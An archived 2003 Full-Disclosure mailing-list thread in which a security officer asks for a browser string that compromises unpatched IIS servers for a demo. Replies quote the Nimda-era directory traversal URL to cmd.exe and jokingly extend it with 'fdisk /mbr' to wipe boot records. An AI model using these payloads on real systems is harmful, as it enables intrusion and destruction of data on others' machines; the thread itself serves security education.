RE: [Full-Disclosure] Unusual request

• Previous message: Nexus: "Re: [Full-Disclosure] Unusual request"
• Maybe in reply to: Paul Schmehl: "[Full-Disclosure] Unusual request"
• Next in thread: John.Airey@rnib.org.uk: "RE: [Full-Disclosure] Unusual request"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Sung J. Choe" <schoe@oicinc.com>
To: "'Steve Wray'" <steve.wray@paradise.net.nz>
Date: Wed, 12 Feb 2003 14:32:46 -1000

> could give a demo of what M$ might have launched on the world
> to get rid of dual-boot boxes!!
 
It may be a bad idea to give Bill Gates and his M$ goons any ideas. Then
again, those lamers who are dual-booting due to fear of the unknown should
probably be more decisive and run linux and only linux. ;-p
 
Sung J. Choe < SChoe[at]oicinc.com <mailto:SChoe@oicinc.com> >, TICSA
Systems Administrator, Facility Security Officer

     Oceanic Imaging Consultants, Inc. / www.oicinc.com
<http://www.oicinc.com/> Ph #: (808) 539-3634

-----Original Message-----
From: Steve Wray [mailto:steve.wray@paradise.net.nz]
Sent: Wednesday, February 12, 2003 2:07 PM
To: full-disclosure@lists.netsys.com
Subject: RE: [Full-Disclosure] Unusual request

I imagine that setting up a dual-boot Linux/Win2k box and
sending it;
 
 <http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe>
http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe%20fdisk%20/mbr
 
could give a demo of what M$ might have launched on the world
to get rid of dual-boot boxes!!
;)
the '/' in '/mbr' may need to be escaped though.
 

-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Sung J. Choe
Sent: Thursday, 13 February 2003 12:42 p.m.
To: 'Paul Schmehl'
Cc: 'full-disclosure@lists.netsys.com'
Subject: RE: [Full-Disclosure] Unusual request

I am looking for an exploit that will give you "root" on
> an unpatched IIS box by simply typing a string in the address line in
> your browser.

I don't know about "root"ing an IIS system but the NIMDA method of
exploiting IIS via:
http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe
<http://victim.com/scripts/..%5c%5c../winnt/system32/cmd.exe> seems to be a
close match to what you are describing.

.--------------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Administrator, Facility Security Officer |
.--------------------------------------------------.----.
                    | Oceanic Imaging Consultants, Inc. |
                    | Phone #: (808) 539-3634 x3634 |
                    .-----------------------------------.

568D CAD6 53A0 92E6 4A2A 4E87 3BA0 5F90 37BB 8EE7

> -----Original Message-----
> From: Paul Schmehl [ mailto:pauls@utdallas.edu <mailto:pauls@utdallas.edu>
]
> Sent: Wednesday, February 12, 2003 1:26 PM
> To: Full-Disclosure
> Subject: [Full-Disclosure] Unusual request
>
>
> The net is filled with so much junk now, it's getting harder to find
> what you need. I am looking for an exploit that will give
> you "root" on
> an unpatched IIS box by simply typing a string in the address line in
> your browser. I know I've seen it before, but I can't seem to find it
> amongst all the vulns for IIS and all the web logs that show
> up when you
> google.
>
> I need this for a "security roadshow" that we're putting
> together, so I
> can demonstrate how easy it is to break in to an unpatched box. Can
> anybody point me in the right direction?
>
> I don't want exploit code. This is just a simple string that
> you enter
> into the URL box in a browser. It's at least two or three
> years old, I
> know.
>
> --
> Paul Schmehl (pauls@utdallas.edu)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> http://www.utdallas.edu/~pauls/ <http://www.utdallas.edu/~pauls/>
> AVIEN Founding Member
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
<http://lists.netsys.com/full-disclosure-charter.html>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• application/octet-stream attachment: schoe.vcf

• Next message: yossarian: "Re: [Full-Disclosure] Unusual request"
• Previous message: Nexus: "Re: [Full-Disclosure] Unusual request"
• Maybe in reply to: Paul Schmehl: "[Full-Disclosure] Unusual request"
• Next in thread: John.Airey@rnib.org.uk: "RE: [Full-Disclosure] Unusual request"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages LsaSrv Event ID 5000 Error Message ... Gestern ist unter Full-Disclosure ein Exploit aufgetaucht, ... welcher die letzte "IIS 5 SSL pct" Sicherheitslücke ... Microsoft hat zwar dazu einen ... (microsoft.public.de.inetserver.iis) RE: [Full-Disclosure] HTTP request with SMTP message ... url rewrite engine for IIS. ... you recompile apache for mod_rewrite). ... Not included in every version of IIS, ... [Full-Disclosure] HTTP request with SMTP message ... (Full-Disclosure) RE: [Full-Disclosure] Unusual request ... I imagine that setting up a dual-boot Linux/Win2k box and ... Subject: [Full-Disclosure] Unusual request ... I don't know about "root"ing an IIS system but the NIMDA method of ... > Adjunct Information Security Officer ... (Full-Disclosure) RE: [Full-Disclosure] IIS Security Page ... Turk, read up on anything Stefan Norberg has written. ... Subject: [Full-Disclosure] IIS Security Page ... I rember back in the day when no one used something as horrible as IIS ... Charter: http://lists.netsys.com/full-disclosure-charter.html ... (Full-Disclosure)